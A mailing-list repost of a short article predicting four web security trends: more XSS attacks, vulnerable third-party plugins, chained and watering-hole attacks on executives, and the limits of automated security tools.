Four cyber security risks not to be taken for granted

[Audrey McNeil <audrey () riskbasedsecurity com>]

http://net-security.org/article.php?id=2192

It's pretty difficult to make information security predictions, and even
more difficult to verify them afterwards: we can only judge the
effectiveness of information security by the number of public security
incidents that were uncovered, while the majority of data breaches remain
undetected.

However, we can try to make some web security predictions based on common
sense profitability (profit/cost ratio) for hackers:

1. XSS will become a more frequent and dangerous vector of attacks

It's very difficult to detect high or critical risk vulnerabilities in
well-known web products (e.g. Joomla, WordPress, SharePoint, etc). However,
low and medium risk vulnerabilities, such as XSS, will still regularly
appear. Sophisticated exploitation of an XSS can give the same outcomes as
an SQL injection vulnerability, therefore hackers will rely on XSS attacks
more and more to achieve their goals.

2. Third-party code and plugins will remain the Achilles' Heel of web
applications

While the core code of well-known CMSs and other web products are fairly
secure today, third-party code such as plugins or extensions remain
vulnerable even to high-risk vulnerabilities. People tend to forget that
one outdated plugin or third-party website voting script endanger the
entire web application. Obviously hackers will not miss such opportunities.

3. Chained attacks via third-party websites will grow

Nowadays, it's pretty difficult to find a critical vulnerability on a
well-known website. It is much quicker, and thus cheaper, for hackers to
find several medium risk vulnerabilities that in combination allow complete
access to the website. Another trend is to attack a reputable website that
the victim regularly visits. For example, when chasing for a C-level
executive, hackers may compromise several high-profile financial websites
or newspapers, and insert an exploit pack that will be activated only for a
specific IP, user-agent and authentication cookie combination belonging to
the victim. Such attacks are very complicated to detect, as only the victim
can notice the attack.

4. Automated security tools and solutions will no longer be efficient

Web Application Firewalls, Web Vulnerability Scanners or Malware Detection
services will not be efficient anymore if used independently or without
human control. Both web vulnerabilities and web attacks are becoming more
and more sophisticated and complex to detect, and human intervention is
almost always necessary to fully detect all the vulnerabilities. It's not
enough to patch 90% or even 99% of the vulnerabilities - hackers will
detect the last vulnerability and use it to compromise the entire website.

_______________________________________________
Dataloss Mailing List (dataloss () datalossdb org)
Archived at http://seclists.org/dataloss/
Unsubscribe at http://lists.osvdb.org/mailman/listinfo/dataloss
For inquiries regarding use or licensing of data, e-mail
        sales () riskbasedsecurity com 

Supporters:

Risk Based Security (http://www.riskbasedsecurity.com/)
YourCISO is an affordable SaaS solution that provides a comprehensive information security program that ensures focus 
on the right security.  If you need security help or want to provide real risk reduction for your clients contact us!